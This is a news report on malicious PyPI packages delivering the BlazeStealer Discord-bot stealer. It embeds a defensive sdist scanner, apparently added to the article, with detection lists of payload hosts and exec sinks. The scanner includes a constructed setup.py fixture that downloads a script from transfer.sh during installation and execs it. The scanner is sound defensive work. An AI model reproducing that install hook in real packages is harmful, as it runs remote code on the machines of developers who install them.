Researchers have uncovered a new set of malicious Python packages on the Python Package Index (PyPI) whose primary objective is stealing sensitive information from the developer systems on which they are installed.

The packages pose as harmless code-obfuscation tools but carry a malicious component known as BlazeStealer, as reported by Checkmarx.

BlazeStealer operates by retrieving an additional malevolent script from an external source, which then empowers a Discord bot, granting attackers full control over the victim’s computer, according to Yehuda Gelb, a security researcher.

This malicious campaign began in January 2023 and encompasses a total of eight packages: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood. The last of these, pyobfgood, was published in October.

Each of these packages contains a setup.py and an __init__.py file written to retrieve a Python script hosted on transfer[.]sh and run it. Because pip executes setup.py while installing the package, the download and execution happen at installation time, before any of the package's code is imported; the __init__.py hook fires again on first import.
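The hook described above (a setup.py or __init__.py that downloads a script and executes it) can be triaged statically before a package is ever installed. The scanner below is an added example, not code from the page or from Checkmarx: it unpacks an sdist in memory, parses every setup.py and __init__.py with Python's `ast` module, resolves import aliases, and flags files that combine a network fetch with exec/eval or a shell call, or that reference a throwaway payload host. The sample sdist, the `pyobfdemo` package name, the transfer.sh URL, and the use of a setuptools `cmdclass` to wire the hook are all constructed for this illustration; the page does not say how the real packages wired theirs.

```python
"""Static triage of a Python sdist for the fetch-then-exec install hook.

Added example (not from the page or Checkmarx).  Host list, call lists,
sample package and URL are assumptions made for this illustration.
"""
import ast
import io
import tarfile

# Calls that pull data off the network (module.attr after alias resolution).
FETCH_CALLS = {"urllib.request.urlopen", "urllib.urlopen", "requests.get",
               "requests.post", "httpx.get"}
# Sinks that turn fetched bytes into running code or shell commands.
EXEC_CALLS = {"exec", "eval", "subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen"}
# Throwaway payload stores; transfer.sh is the one named in this campaign.
SUSPECT_HOSTS = ("transfer.sh", "pastebin.com", "discord.com/api/webhooks")


class _Scanner(ast.NodeVisitor):
    def __init__(self):
        self.aliases = {}            # local name -> fully qualified name
        self.fetch, self.execs, self.hosts = [], [], []
        self.scope = []              # enclosing class/function names

    def visit_Import(self, node):
        for a in node.names:         # `import urllib.request as ur` -> ur: urllib.request
            root = a.name.split(".")[0]
            self.aliases[a.asname or root] = a.name if a.asname else root
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        for a in node.names:         # `from x import y as z` -> z: x.y
            self.aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        self.generic_visit(node)

    def visit_FunctionDef(self, node):
        self.scope.append(node.name)
        self.generic_visit(node)
        self.scope.pop()
    visit_AsyncFunctionDef = visit_ClassDef = visit_FunctionDef

    def _qualname(self, func):
        parts = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if not isinstance(func, ast.Name):
            return None              # e.g. a call on a call result: x().read()
        parts.append(self.aliases.get(func.id, func.id))
        return ".".join(reversed(parts))

    def visit_Call(self, node):
        name = self._qualname(node.func)
        where = ".".join(self.scope) or "<module>"
        if name in FETCH_CALLS:
            self.fetch.append((node.lineno, name, where))
        elif name in EXEC_CALLS:
            self.execs.append((node.lineno, name, where))
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            for host in SUSPECT_HOSTS:   # also catch defanged host[.]tld strings
                if host in node.value.replace("[.]", "."):
                    self.hosts.append((node.lineno, host))


def scan_source(src: str) -> dict:
    """Return findings for one Python file; 'suspicious' on fetch+exec or a known host."""
    s = _Scanner()
    s.visit(ast.parse(src))
    verdict = "suspicious" if (s.fetch and s.execs) or s.hosts else "clean"
    return {"fetch": s.fetch, "exec": s.execs, "hosts": s.hosts, "verdict": verdict}


def scan_sdist(tar_bytes: bytes) -> dict:
    """Scan every setup.py and __init__.py inside a .tar.gz sdist (bytes, not installed)."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.rsplit("/", 1)[-1] in ("setup.py", "__init__.py"):
                text = tar.extractfile(m).read().decode("utf-8", "replace")
                results[m.name] = scan_source(text)
    return results


# Constructed sample: a setup.py that fetches and execs a second stage during
# `pip install` via a custom install command (one way such a hook can be wired).
MALICIOUS_SETUP = '''\
from setuptools import setup
from setuptools.command.install import install
import urllib.request as ur

class PostInstall(install):
    def run(self):
        install.run(self)
        code = ur.urlopen("https://transfer.sh/CONSTRUCTED/stage2.py").read()
        exec(code)

setup(name="pyobfdemo", version="0.1", cmdclass={"install": PostInstall})
'''
BENIGN_INIT = '''\
"""A harmless package used as a control."""
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''


def build_sample_sdist() -> bytes:
    """Constructed in-memory sdist: one malicious setup.py, one benign __init__.py."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in (("pyobfdemo-0.1/setup.py", MALICIOUS_SETUP),
                           ("pyobfdemo-0.1/pyobfdemo/__init__.py", BENIGN_INIT)):
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for path, r in scan_sdist(build_sample_sdist()).items():
        print(f"{path}: {r['verdict']} fetch={r['fetch']} exec={r['exec']} hosts={r['hosts']}")
```

Run it against a real candidate with `pip download --no-deps --no-binary :all: <name>` and pass the resulting .tar.gz bytes to `scan_sdist`; a wheel has no setup.py to run at install time, so for wheels only the __init__.py findings matter. The scanner is a triage aid, not a verdict: obfuscated or string-assembled calls will evade it, and a hit on `requests.get` plus `subprocess.run` in a legitimate build script is a false positive to read by hand.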

BlazeStealer, the malware delivered by these packages, operates as a Discord bot, enabling the threat actor to harvest a broad range of information from the compromised host: passwords stored by web browsers, screenshots, and the output of arbitrary commands. It can also encrypt files and disable Microsoft Defender Antivirus.

Furthermore, it can render the victim's computer inoperable by driving up CPU usage, dropping a Windows Batch script into the startup directory that shuts the system down, and even inducing a blue screen of death (BSoD) error.

Yehuda Gelb emphasized that developers involved in code obfuscation typically handle valuable and sensitive information, making them attractive targets for hackers.

A significant number of downloads associated with these malicious packages originated in the United States, followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. These packages were downloaded a total of 2,438 times before they were eventually removed.

Gelb underscored the importance of caution in the open-source domain, advising developers to exercise vigilance and thoroughly assess packages before incorporating them into their projects.
